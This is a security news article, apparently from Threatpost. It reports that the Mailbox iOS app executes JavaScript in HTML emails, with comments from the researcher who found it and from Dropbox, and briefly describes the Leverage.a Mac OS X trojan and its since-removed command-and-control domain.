UPDATE – The popular Mailbox app for iOS suffers from a bit of a security nightmare. A security researcher in Italy recently discovered that the app automatically executes javascript contained in any HTML email.

“It is just a bad design choice,” said researcher Michele Spagnulo, a computer engineering student in Milan who has collected four Google security rewards. “Mailbox.app by default also loads external images in emails, which is bad for privacy because the sender can know the exact time when you opened the mail and several more information about you. Javascript execution is surely more serious.”

Users could be subject to account hijacking, spam and phishing attacks by simply opening an HTML email containing embedded javascript.

“Allowing javascript in emails is a bad idea security-wise, and this is why it is stripped out of HTML email by default in all major email clients,” Spagnulo said.

A Dropbox representative said the risks are limited because of the inter-app security built into iOS.

“That being said, we’re working on an improvement to mail formatting that will mitigate the issue entirely and aim to ship it soon,” Dropbox told Threatpost.

Spagnulo demonstrated in a video on his site how the vulnerability is exploited. He used the app to open emails that sent tweets or SMS messages on his behalf, opened his Web browser, photo archive and more.

“A spammer can collect detailed information on the device that viewed the email and display invasive ads, while a malicious attacker, using a browser exploitation framework can perform phishing attacks, hijackings, potentially transforming the victim into a zombie host,” he said.

The Mailbox app is an alternative to the mail client native to iOS on Apple mobile devices. Recently acquired by Dropbox, the app is promoted as having features that help users navigate their inbox in a more efficient manner, as well as speeding up delivery of messages.

Meanwhile, researchers at AlienVault Lab have dug deeper into the Leverage.a Trojan targeting Mac OS X machines. The Trojan was being used in targeted attacks and arrives purporting to be an image file. When the user executes the file, either after receiving it via a phishing email or visiting a compromised website, the malware attempts to connect to a command and control server giving the botmaster remote control over the machine to install more malware or run code.

AlienVault researcher Eduardo De la Arada said the malware tries to connect to the domain servicesmsc[.]sytes[.]net, but that domain has since been taken down. The malware, he said, is written in Realbasic, which enables the attacker to build the code for other platforms such as Windows and Linux.

Article updated at 1:40 p.m. ET with comments from Dropbox

Categories: Vulnerabilities